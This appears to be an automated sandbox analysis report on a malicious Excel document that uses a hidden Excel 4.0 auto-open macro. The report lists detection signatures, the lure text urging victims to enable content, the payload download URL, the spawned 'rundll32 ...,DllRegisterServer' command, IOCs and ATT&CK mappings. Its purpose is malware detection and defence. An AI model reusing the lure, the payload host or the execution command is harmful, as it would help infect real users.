Analysis Report SecuriteInfo.com.Heur.15528.14839

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.15528.14839 (renamed file extension from 14839 to xls)
Analysis ID:356212
MD5:5a75c6184001a6b8785206f1e2121290
SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2456 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2820 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: SecuriteInfo.com.Heur.15528.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x11da3:$e1: Enable Editing
  • 0x11e18:$e2: Enable Content

Source: SecuriteInfo.com.Heur.15528.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148a2:$s1: Excel
  • 0x15906:$s1: Excel
  • 0x3802:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Source: SecuriteInfo.com.Heur.15528.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, ProcessId: 2820

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Heur.15528.xls; Virustotal: Detection: 9%

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.22:49167 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe
Source: global traffic; DNS query: name: pg.happyslot88.cc
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 139.162.8.120:443
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: pg.happyslot88.cc
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: SecuriteInfo.com.Heur.15528.xls; String found in binary or memory: https://pg.happyslot88.cc/ds/2202.gif
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown; Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown; HTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.22:49167 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1; Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6; Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Heur.15528.xls; Initial sample: EXEC
Source: SecuriteInfo.com.Heur.15528.xls; OLE indicator, VBA macros: true
Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLE; Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLE; Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal76.expl.evad.winXLS@3/11@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\12DE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRCABD.tmp
Source: SecuriteInfo.com.Heur.15528.xls; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
Source: SecuriteInfo.com.Heur.15528.xls; Virustotal: Detection: 9%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX

HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match; File source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLE

Mitre Att&ck Matrix

(Trailing digits on a technique name are counts carried over from the original table's superscripts.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting11 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting11 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings

Behavior Graph

(Behavior graph image not included in this extraction; only its legend was present.)

Screenshots

(Screenshot thumbnails not included in this extraction.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Heur.15528.xls | 10% | Virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
pg.happyslot88.cc | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
https://pg.happyslot88.cc/ds/2202.gif | 2% | Virustotal |
https://pg.happyslot88.cc/ds/2202.gif | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pg.happyslot88.cc | 139.162.8.120 | true | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp | false | | high
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmp | false | | high
https://pg.happyslot88.cc/ds/2202.gif | SecuriteInfo.com.Heur.15528.xls | false | 2% Virustotal; Avira URL Cloud: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
139.162.8.120 | unknown | Netherlands | 63949 | LINODE-APLinodeLLCUS | false

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:356212
Start date:22.02.2021
Start time:19:14:16
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 37s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:SecuriteInfo.com.Heur.15528.14839 (renamed file extension from 14839 to xls)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.evad.winXLS@3/11@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.210, 2.20.142.209
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: LINODE-APLinodeLLCUS

Associated Sample Name / URL | Detection | Context
Drawings2.exe | malicious | 45.56.79.23
Sign-1870635479_637332644.xls | malicious | 176.58.123.25
SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 176.58.123.25
SecuriteInfo.com.Heur.1476.xls | malicious | 176.58.123.25
Sign-92793351_1597657581.xls | malicious | 176.58.123.25
Invoice467972.jar | malicious | 23.239.31.129
Invoice467972.jar | malicious | 23.239.31.129
SecuriteInfo.com.Heur.22173.xls | malicious | 176.58.123.25
Deposit_50%PAYMENT TERM -PO09-excel.htm | malicious | 45.79.77.20
Sign_1229872171-1113140666(1).xls | malicious | 176.58.123.25
IU-8549 Medical report COVID-19.doc | malicious | 172.104.97.173
SecuriteInfo.com.Exploit.Siggen3.10048.24657.xls | malicious | 176.58.123.25
SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls | malicious | 176.58.123.25
Invoice#6026115.xls | malicious | 172.104.247.192
index_2021-02-17-11_45.dll | malicious | 176.58.123.25
MT0128.jar | malicious | 23.239.31.129
MT0128.jar | malicious | 23.239.31.129
v.dll | malicious | 172.104.247.192
SecuriteInfo.com.Exploit.Siggen3.10048.426.xls | malicious | 176.58.123.25
ransomware.exe | malicious | 66.228.32.51

JA3 Fingerprints

Match: 7dcce5b76c8b17472d024758970a406b

Associated Sample Name / URL | Detection | Context
Subconract 504.xlsm | malicious | 139.162.8.120
upbck.xlsx | malicious | 139.162.8.120
IMG_6078_SCANNED.doc | malicious | 139.162.8.120
RFQ Manual Supersucker en Espaol.xlsx | malicious | 139.162.8.120
_a6590.docx | malicious | 139.162.8.120
Small Charities.xlsx | malicious | 139.162.8.120
quotation10204168.dox.xlsx | malicious | 139.162.8.120
notice of arrival.xlsx | malicious | 139.162.8.120
22-2-2021 .xlsx | malicious | 139.162.8.120
Shipping_Document.xlsx | malicious | 139.162.8.120
Remittance copy.xlsx | malicious | 139.162.8.120
CI + PL.xlsx | malicious | 139.162.8.120
RFQ_Enquiry_0002379_.xlsx | malicious | 139.162.8.120
124992436.docx | malicious | 139.162.8.120
document-1900770373.xls | malicious | 139.162.8.120
AswpCUetE0.doc | malicious | 139.162.8.120
EIY2otZ3r8.doc | malicious | 139.162.8.120
Invoice.ppt | malicious | 139.162.8.120
Invoice.ppt | malicious | 139.162.8.120
SecuriteInfo.com.Exploit.Siggen3.10343.28053.xls | malicious | 139.162.8.120

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:dropped
Size (bytes):59134
Entropy (8bit):7.995450161616763
Encrypted:true
SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:E92176B0889CC1BB97114BEB2F3C1728
SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:false
Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):893
Entropy (8bit):7.366016576663508
Encrypted:false
SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:false
Reputation:high, very likely benign file
                Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):328
Entropy (8bit):3.090852246460564
Encrypted:false
SSDEEP:6:kKBsPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:CW3kPlE99SNxAhUeo+aKt
MD5:0A6D58C6587151522D1A18EDE041E928
SHA1:FD25FDB89E68ACE622696DF70232758D9F4F73CC
SHA-256:FD3A019FB17300D9B4EA886C1A360ACD15AD39F941D5F687918948258AF03AE9
SHA-512:6B2333AC063288AC572E9AA0D59020EE2C2B61B632C45884259338BE9DF709B2E49900809B6509C247722DCA23C64862D9B388C32B7AD21CC1122CA82712A6D3
Malicious:false
Reputation:low
                Preview: p...... ........'.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):252
Entropy (8bit):3.0294634724686764
Encrypted:false
SSDEEP:3:kkFkl4LsykltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKCnliBAIdQZV7eAYLit
MD5:87F438332CAC19A282D84CDB699DFE96
SHA1:8468767CC6288E819AF102485CC75CF9D1ACA45F
SHA-256:516B17B0C42A5247F7C6CBF1C23FFD1B10DC6C94B9EE2692BD0A6A9487FBAA21
SHA-512:A3F1E74FAD036D3A30A3C1E7D8CB1E8F4BC850EB6AC08FF38278ACA61EE41990C7255BFBF23A91F857A55D7D100D3B8FB9CF01D6CD0D2F31842B4AC7FF9B8F04
Malicious:false
Reputation:low
                Preview: p...... ....`....f......(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                C:\Users\user\AppData\Local\Temp\71DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):65815
                Entropy (8bit):7.694630584448929
                Encrypted:false
                SSDEEP:1536:wANiiqSiBjAdwroSgiB9uCbMljf2fu9X9bGi2vKnW+CcT:wU6SOjVuiTuColjf2faNbovSWQT
                MD5:5B13DC3CB9F6E2D5C1D5EA6F503AA3DE
                SHA1:BE0C892A532DEDBC604902A821F13B72CC93B6DF
                SHA-256:5D783871ECEB6ED03B4866B164A04F2AA297867250B4CA5C3B83A76595D4DECB
                SHA-512:C365DDEF314080F0009C8C70DAA41F43ED4645EE356E246AE7337809A2796404ACB10FD25FE8096AF97E574A4D0BB439DBA3A7FC92DEB2E64DA039086CDBBA30
                Malicious:false
                Reputation:low
                Preview: ..N.0...W.."....j.....$....4..?....q..P...J.4m.s.7.t<.\.]<c....U.V..N*.....o...1......1.......c,Hmc...o.h.@..GK+...$....A,.A~>.\p.lB..=.l....Sq.....o.V\m..Q5S&..}.S1WvK..k% Qi...-..-.J.t...L.}@..ELFW>(b....."~..P..B.>T...b.|<.f}..W...mU..60(....t....W.....;......X.J....+.".k.s......I.w..OD..I..F..3...{..?.i......2.7`.e..S...?..#...y...7..........%..P.'......z.p../..._....h$W..W-M.#7...O3..8.. .x8.........p..f.H........1'Q....:........PK..........!...l.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\CabDCC9.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\TarDCCA.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
                Reputation:moderate, very likely benign file
